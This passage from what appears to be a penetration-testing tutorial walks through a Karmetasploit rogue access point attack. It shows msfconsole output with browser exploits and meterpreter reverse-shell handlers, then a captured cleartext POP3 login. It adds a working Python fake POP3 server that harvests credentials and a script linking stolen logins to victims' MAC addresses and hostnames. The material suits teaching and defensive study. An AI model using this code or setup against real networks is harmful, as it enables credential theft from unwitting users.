
Karmetasploit


URIPATH => /ads
resource (karma.rc)> run
[*] Auxiliary module execution completed
resource (karma.rc)> use auxiliary/server/capture/pop3
resource (karma.rc)> set SRVPORT 110
SRVPORT => 110
resource (karma.rc)> set SSL false
SSL => false
resource (karma.rc)> run
. . . SNIP . . .
[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:55550/N9wReDJhfKg
[*] Local IP: http://192.168.1.101:55550/N9wReDJhfKg
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 10.0.0.1:3333
[*] Starting the payload handler...
[*] Started reverse handler on 10.0.0.1:6666
[*] Starting the payload handler...
[*] --- Done, found 15 exploit modules
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://192.168.1.101:55550/ads
[*] Server started.

As you can see, a great deal is happening in the resource file. In this listing, the LHOST address is set to 10.0.0.1, the POP3 capture service (among others) is started on port 110 with SSL disabled so that clients send their logins in cleartext, the autopwn exploits are loaded, and the payloads are configured. Note that the browser exploit server binds to 0.0.0.0 and reports 192.168.1.101 as its Local IP, while the reverse handlers listen on LHOST 10.0.0.1: clients on the rogue network reach both through 10.0.0.1, the address of the fake access point.
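The auxiliary/server/capture/pop3 module started in the resource file is nothing more than a fake POP3 server that says "+OK" until a mail client volunteers its login, records it, and never serves any mail. The following is an added example, not code from the book or from the Metasploit project, of the same idea in Python. It handles the classic USER/PASS exchange the book's victim sends and also AUTH PLAIN, whose base64 blob carries the password in the clear; the loopback port, the server's exact replies (rejecting every login) and the two client functions with their credentials are this example's assumptions, not a description of the module's internals.

```python
import base64
import socket
import threading


def _recv_line(conn):
    """Read one CRLF-terminated line from a socket; return '' on EOF."""
    buf = b""
    while not buf.endswith(b"\r\n"):
        chunk = conn.recv(1)
        if not chunk:
            break
        buf += chunk
    return buf.decode("utf-8", "replace").rstrip("\r\n")


def handle_client(conn, captured):
    """Speak just enough POP3 to make a client hand over its login.

    Every USER/PASS or AUTH PLAIN attempt is recorded as (peer, user, password)
    and then rejected, so the client never sees a mailbox (this example's choice).
    """
    peer = "%s:%d" % conn.getpeername()
    user = None
    conn.sendall(b"+OK POP3 server ready\r\n")  # banner a real server would send
    while True:
        line = _recv_line(conn)
        if not line:
            break
        verb, _, arg = line.partition(" ")
        verb = verb.upper()
        if verb == "CAPA":
            # Advertise only cleartext mechanisms and no STLS, so nothing nudges the client to encrypt.
            conn.sendall(b"+OK\r\nUSER\r\nSASL PLAIN\r\n.\r\n")
        elif verb == "USER":
            user = arg
            conn.sendall(b"+OK\r\n")
        elif verb == "PASS":
            captured.append((peer, user, arg))
            conn.sendall(b"-ERR invalid login\r\n")
        elif verb == "AUTH" and arg.upper().startswith("PLAIN"):
            # The blob may ride on the AUTH line itself or follow a "+ " continuation prompt.
            blob = arg.split(" ", 1)[1] if " " in arg else None
            if blob is None:
                conn.sendall(b"+ \r\n")
                blob = _recv_line(conn)
            try:
                # SASL PLAIN payload is "authzid\0authcid\0password"
                _authz, authn, pw = base64.b64decode(blob, validate=True).decode("utf-8", "replace").split("\0")
            except ValueError:  # bad base64 (binascii.Error) or wrong field count
                conn.sendall(b"-ERR malformed credentials\r\n")
                continue
            captured.append((peer, authn, pw))
            conn.sendall(b"-ERR invalid login\r\n")
        elif verb == "QUIT":
            conn.sendall(b"+OK bye\r\n")
            break
        else:
            conn.sendall(b"-ERR command not supported\r\n")
    conn.close()


def capture_from(clients):
    """Start the fake server on an ephemeral loopback port (Karmetasploit uses
    0.0.0.0:110), run each client function against it, return harvested logins."""
    captured = []
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    port = srv.getsockname()[1]

    def accept_loop():
        for _ in clients:
            conn, _addr = srv.accept()
            handle_client(conn, captured)

    worker = threading.Thread(target=accept_loop, daemon=True)
    worker.start()
    for client in clients:
        client(port)
    worker.join(timeout=5)
    srv.close()
    return captured


def _exchange(sock, line):
    """Send one command line and return the server's first reply line."""
    sock.sendall(line.encode() + b"\r\n")
    return _recv_line(sock)


def user_pass_client(port):
    """A legacy mail client logging in with USER/PASS (credentials constructed for the example)."""
    with socket.create_connection(("127.0.0.1", port)) as s:
        _recv_line(s)                    # banner
        _exchange(s, "USER bsmith")
        _exchange(s, "PASS s3cr3tp4s5")  # server answers -ERR; the client gives up
        _exchange(s, "QUIT")


def auth_plain_client(port):
    """A client using SASL PLAIN, sending the blob after the "+ " prompt (constructed credentials)."""
    blob = base64.b64encode(b"\0jdoe\0Winter2024!").decode()
    with socket.create_connection(("127.0.0.1", port)) as s:
        _recv_line(s)
        _exchange(s, "AUTH PLAIN")
        _exchange(s, blob)
        _exchange(s, "QUIT")


if __name__ == "__main__":
    for peer, user, password in capture_from([user_pass_client, auth_plain_client]):
        print("[*] POP3 LOGIN %s %s / %s" % (peer, user, password))
```

Because neither USER/PASS nor AUTH PLAIN protects the password on the wire, a server that merely answers "+OK" at the right moments gets the login; the only defence on the client side is insisting on TLS (STLS or POP3S), which is exactly why the resource file sets SSL false and why the fake CAPA reply above omits STLS.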

Credential Harvesting

When a client connects to our malicious access point, the messages file we are tailing will show us when an IP address is handed out. This is our cue to switch back to msfconsole to see what is happening. Here, we see that a client connects and is assigned an IP address:

Apr  2 15:07:34 bt dhcpd: DHCPDISCOVER from 00:17:9a:b2:b1:6d via at0
Apr  2 15:07:35 bt dhcpd: DHCPOFFER on 10.0.0.100 to 00:17:9a:b2:b1:6d (v-xp-sp2-bare) via at0
Apr  2 15:07:35 bt dhcpd: DHCPREQUEST for 10.0.0.100 (10.0.0.1) from 00:17:9a:b2:b1:6d (v-xp-sp2-bare) via at0
Apr  2 15:07:35 bt dhcpd: DHCPACK on 10.0.0.100 to 00:17:9a:b2:b1:6d (v-xp-sp2-bare) via at0

The first thing our target does is open an email client. Karmetasploit is waiting: its fake DNS server answers every lookup with our own address, so the query for pop3.securemail.com sends the client's POP3 connection straight to the capture server on port 110, where the cleartext login is recorded, as shown here:

[*] DNS 10.0.0.100:1049 XID 45030 (IN::A time.windows.com)
[*] DNS 10.0.0.100:1049 XID 47591 (IN::A pop3.securemail.com)
[*] POP3 LOGIN 10.0.0.100:1102 bsmith / s3cr3tp4s5
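In a real engagement the msfconsole output identifies victims only by IP address, while the dhcpd messages carry the MAC and hostname, so tying a harvested login back to a specific device means joining the two logs on the leased IP. The following added example, not code from the book or from Metasploit, does that join over the line formats shown above. The sample logs are constructed for the example: the dhcpd lines and the first three msf lines are copied from the page's listings, the second lease (10.0.0.101) and the login from 10.0.0.102 are invented to exercise the two edge cases (a lease with no traffic, and traffic from an address dhcpd never handed out).

```python
import re
from collections import defaultdict

# Line formats as they appear in the book's listings: ISC dhcpd syslog output
# and the [*] lines msfconsole prints for the fake DNS and POP3 capture servers.
DHCPACK = re.compile(r"dhcpd: DHCPACK on (\S+) to ([0-9a-fA-F:]{17})(?: \(([^)]*)\))? via (\S+)")
DNS_QUERY = re.compile(r"\[\*\] DNS (\S+):\d+ XID \d+ \(IN::A (\S+)\)")
POP3_LOGIN = re.compile(r"\[\*\] POP3 LOGIN (\S+):\d+ (\S+) / (.+)$")  # passwords may contain spaces


def correlate(dhcp_lines, msf_lines):
    """Return {client_ip: {"mac", "host", "dns", "creds"}} for every IP that
    touched a capture server, joined on the IP dhcpd last handed out."""
    leases = {}  # ip -> (mac, hostname); a later DHCPACK for the same IP wins
    for line in dhcp_lines:
        m = DHCPACK.search(line)
        if m:
            ip, mac, host, _iface = m.groups()
            leases[ip] = (mac.lower(), host or "")

    report = defaultdict(lambda: {"mac": None, "host": "", "dns": [], "creds": []})
    for line in msf_lines:
        m = DNS_QUERY.search(line)
        if m:
            ip, name = m.groups()
            if name not in report[ip]["dns"]:
                report[ip]["dns"].append(name)
            continue
        m = POP3_LOGIN.search(line)
        if m:
            ip, user, password = m.groups()
            report[ip]["creds"].append(("pop3", user, password))

    for ip, entry in report.items():
        # An IP without a lease means the client kept an address from elsewhere
        # (or the lease scrolled by before we started tailing); leave mac=None so
        # the report shows the gap rather than a guess.
        entry["mac"], entry["host"] = leases.get(ip, (None, ""))
    return dict(report)


# Constructed sample logs (see the lead-in for which lines come from the page).
DHCP_LOG = [
    "Apr  2 15:07:34 bt dhcpd: DHCPDISCOVER from 00:17:9a:b2:b1:6d via at0",
    "Apr  2 15:07:35 bt dhcpd: DHCPACK on 10.0.0.100 to 00:17:9a:b2:b1:6d (v-xp-sp2-bare) via at0",
    "Apr  2 15:09:02 bt dhcpd: DHCPACK on 10.0.0.101 to 00:1b:77:aa:bb:cc via at0",
]
MSF_LOG = [
    "[*] DNS 10.0.0.100:1049 XID 45030 (IN::A time.windows.com)",
    "[*] DNS 10.0.0.100:1049 XID 47591 (IN::A pop3.securemail.com)",
    "[*] POP3 LOGIN 10.0.0.100:1102 bsmith / s3cr3tp4s5",
    "[*] POP3 LOGIN 10.0.0.102:1201 guest / pass word",  # no lease seen for this IP
]

if __name__ == "__main__":
    for ip, e in sorted(correlate(DHCP_LOG, MSF_LOG).items()):
        print(ip, e["mac"] or "no lease seen", e["host"], e["dns"], e["creds"])
```

The DNS names are kept alongside the credentials because they show which mail server the client believed it was talking to; that is the detail needed to report the finding as "credentials for pop3.securemail.com from host v-xp-sp2-bare" rather than an anonymous IP.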